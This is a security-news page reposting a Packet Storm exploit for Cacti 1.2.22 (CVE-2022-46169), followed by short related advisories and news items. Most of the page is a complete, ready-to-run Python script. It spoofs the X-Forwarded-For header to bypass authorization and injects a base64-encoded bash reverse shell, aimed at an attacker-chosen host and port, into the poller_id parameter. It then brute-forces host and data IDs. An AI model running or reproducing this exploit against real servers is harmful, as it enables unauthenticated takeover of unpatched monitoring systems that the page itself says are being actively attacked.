Security
Headlines
HeadlinesLatestCVEs

Headline

Cacti 1.2.22 Remote Command Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

Packet Storm
#vulnerability#web#windows#apple#debian#git#php#auth#chrome#webkit#firefox
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Related news

Cacti, Realtek, and IBM Aspera Faspex Vulnerabilities Under Active Exploitation

Critical security flaws in Cacti, Realtek, and IBM Aspera Faspex are being exploited by various threat actors in hacks targeting unpatched systems. This entails the abuse of CVE-2022-46169 (CVSS score: 9.8) and CVE-2021-35394 (CVSS score: 9.8) to deliver MooBot and ShellBot (aka PerlBot), Fortinet FortiGuard Labs said in a report published this week. CVE-2022-46169 relates to a critical

Cacti 1.2.22 Command Injection

This Metasploit module exploits an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user.

Cacti Servers Under Attack as Majority Fail to Patch Critical Vulnerability

A majority of internet-exposed Cacti servers have not been patched against a recently patched critical security vulnerability that has come under active exploitation in the wild. That's according to attack surface management platform Censys, which found only 26 out of a total of 6,427 servers to be running a patched version of Cacti (1.2.23 and 1.3.0). The issue in question relates to

Debian Security Advisory 5298-1

Debian Linux Security Advisory 5298-1 - Two security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in unauthenticated command injection or LDAP authentication bypass.

CVE-2022-46169: Unauthenticated Command Injection

Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVE...

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution